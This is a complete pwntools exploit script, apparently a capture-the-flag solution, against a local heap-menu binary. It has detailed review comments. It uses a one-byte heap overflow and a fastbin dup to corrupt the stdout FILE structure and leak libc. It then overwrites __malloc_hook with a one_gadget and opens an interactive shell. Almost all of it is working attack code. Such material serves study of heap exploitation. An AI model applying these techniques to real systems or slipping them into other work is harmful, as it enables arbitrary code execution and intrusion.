from pwn import *
# --- environment setup (pwntools) ---
# GDB opens in a vertical tmux split; 'debug' logs every byte exchanged with
# the target, which is what you read when one of the heap steps misfires.
context.update(terminal=['tmux', 'splitw', '-v'], log_level='debug')

# Target binary and the host libc it will load.
# NOTE(review): the libc path, the leak offset and the one_gadget list below
# are all pinned to one specific libc build — presumably the one this
# challenge shipped with.  Against any other build they must be recomputed.
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Candidate one_gadget offsets for that libc; only one[3] is used later.
one = [0x45226, 0x4527a, 0xf0364, 0xf1207]

io = process('./pwn')
def add(idx, size, con, ch=1):
    """Menu option 1: allocate slot *idx* with *size* bytes and fill it with *con*.

    ch == 1 expects every prompt to be followed by a newline; any other value
    matches the bare prompt text (the framing the script switches to after
    the stdout leak).  *con* is sent without a trailing newline so payloads
    of an exact byte length reach the heap unmodified — including the one
    extra byte the overflow steps rely on.
    """
    nl = '\n' if ch == 1 else ''
    io.sendlineafter('>>>' + nl, '1')
    io.sendlineafter('idx:' + nl, str(idx))
    io.sendlineafter('len:' + nl, str(size))
    io.sendafter('content:' + nl, con)
def dele(idx, ch=1):
    """Menu option 2: free slot *idx*.

    ch == 1 expects every prompt to be followed by a newline; any other value
    matches the bare prompt text.  The binary is trusted to accept repeated
    frees of the same slot — the script depends on that below.
    """
    nl = '\n' if ch == 1 else ''
    io.sendlineafter('>>>' + nl, '2')
    io.sendlineafter('idx:' + nl, str(idx))
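def writeSize(byte, ch=1):
    """Re-allocate slot 1 so that the byte just past its 0x18-byte buffer is *byte*.

    Slot 1 is freed and immediately re-requested at the same size with 0x18
    filler bytes plus *byte* — one byte more than was asked for.  With the
    one-byte overflow this script relies on, that trailing byte presumably
    lands on the low size byte of the following chunk, which is how the
    script flips a chunk between 0x71 and 0xd1.

    *ch* is forwarded to dele()/add() and selects the prompt framing
    (1 = newline-terminated prompts, anything else = bare prompts); the
    default keeps the original behaviour, so existing calls are unchanged.
    """
    dele(1, ch)
    add(1, 0x18, 0x18 * 'A' + byte, ch)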
def writeSize2(byte):
    """Bare-prompt (ch=2) variant of writeSize(): overwrite the byte after slot 1.

    Frees slot 1 and re-requests it with 0x18 filler bytes followed by *byte*,
    i.e. one byte more than the requested length.
    """
    payload = 'A' * 0x18 + byte
    dele(1, 2)
    add(1, 0x18, payload, 2)
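# ---- stage 1: leak a libc address through the stdout FILE struct ----
# NOTE(review): the heap narrative in these comments is reconstructed from
# the request sizes and the bytes written; confirm it against the allocator
# the target actually runs.  Bytes that get concatenated with p8()/p64()/
# recv() results are bytes literals so the script also runs on Python 3
# (on Python 2 b'...' is an ordinary str, so behaviour there is unchanged).

# Five slots; the request sizes give chunks of 0x30, 0x20, 0x70, 0x60, 0x20.
add(0, 0x28, 'aaa')
add(1, 0x18, 'aaa')
add(2, 0x68, 'aaa')
add(3, 0x58, 'bbb')
add(4, 0x10, 'bbb')

# Free slot 2 (fastbin-sized) and slot 0, then re-allocate slot 0 with one
# byte more than its size.  The extra 0xf1 presumably lands on slot 1's size
# byte, so slot 1 now looks like a 0xf0 chunk spanning slots 1-3
# (0x20 + 0x70 + 0x60).
dele(2)
dele(0)
add(0, 0x28, b'A' * 0x28 + p8(0xf1))

# Free the enlarged slot 1 (too big for a fastbin, so it lands in the
# unsorted bin), carve 0x20 back off the front, and take the remainder as
# slot 5 while overwriting the low two bytes of the pointer at its start.
# That pointer aliases the fd of the still-free slot-2 chunk; 0xa5dd
# presumably redirects it to a fake chunk just below _IO_2_1_stdout_.  Only
# 16 bits are written, and the top nibble of them is ASLR-randomised, so
# this step succeeds roughly 1 time in 16 — re-run the script until it does.
dele(1)
add(1, 0x18, 'bbb')
add(5, 0xc0, b'\xdd\xa5')

# The unsorted split stamped 0xd1 onto the slot-2 chunk header; put 0x71 back
# so it passes the fastbin size check, pull it out as slot 6 (leaving the
# forged fd at the head of the 0x70 bin), then restore 0xd1 so slot 5 still
# looks intact.
writeSize('\x71')
add(6, 0x68, 'junk')
writeSize('\xd1')

# The next 0x70 request returns the forged target.  Presumably: 51 bytes of
# padding reach the FILE flags, 0xfbad1800 with zeroed read pointers marks
# the stream as holding unflushed output, and the trailing 0x48 lowers the
# low byte of _IO_write_base so the next flush emits libc pointers first.
add(7, 0x68, 51 * b'\x00' + p64(0xfbad1800) + p64(0) * 3 + b'\x48')

# First 6 bytes out are a libc pointer; 3954339 (0x3c56a3) is its fixed
# distance from the libc base for the targeted build.
# NOTE(review): this constant is pinned to one libc; for another build
# recompute it (libc.sym['_IO_2_1_stdout_'] plus the observed delta is the
# usual way) or the hook address below will be wrong.
libc_base = u64(io.recv(6).ljust(8, b'\x00')) - 3954339
log.success('libc:' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']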
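# ---- stage 2: point __malloc_hook at a one_gadget via the same fastbin dup ----
# From here on every helper is called with ch=2 (bare prompts, no newline).
# The switch presumably compensates for the output framing changing after
# the stdout FILE struct was rewritten above — inferred from the script,
# not visible in the binary.  Bytes concatenated with p64() results are
# bytes literals so this also runs on Python 3 (identical on Python 2).

# Shrink the slot-2 chunk header back to 0x71 and free slot 6 (the same
# memory) into the 0x70 fastbin.  '2' is sent without waiting for a prompt;
# the following sendlineafter re-synchronises on 'idx:'.
writeSize2('\x71')
io.sendline('2')
io.sendlineafter('idx:', '6')

# Repeat the stage-1 overlap: the one-byte overflow from slot 0 enlarges
# slot 1 to 0xf0, it is freed to the unsorted bin and split, and slot 5's
# content overwrites the fd of the freed slot-6 chunk.  This time the fd is
# a full pointer to malloc_hook-0x23, where a 0x7f byte of a libc pointer
# presumably supplies a plausible fastbin size for the fake chunk.
dele(0, 2)
add(0, 0x28, b'A' * 0x28 + b'\xf1', 2)
dele(1, 2)
add(1, 0x18, 'aaa', 2)
add(5, 0xc0, p64(malloc_hook - 0x23), 2)
writeSize2('\x71')
add(6, 0x68, 'junk', 2)
writeSize2('\xd1')

# The next 0x70 request returns malloc_hook-0x13; 0x13 bytes of padding put
# the one_gadget address exactly on __malloc_hook.  one[3] is presumably the
# gadget whose register/stack constraints hold at this call site; if the
# target libc differs, both `one` and the leak offset must be recomputed.
add(8, 0x68, 0x13 * b'\x00' + p64(one[3] + libc_base), 2)

# Any further malloc() now runs the gadget: request one more slot and drop
# into the shell.  The content prompt is deliberately never answered — the
# hook fires inside malloc before it is printed.
io.sendlineafter('>>>', '1')
io.sendlineafter('idx:', '9')
io.sendlineafter('len:', '16')
io.interactive()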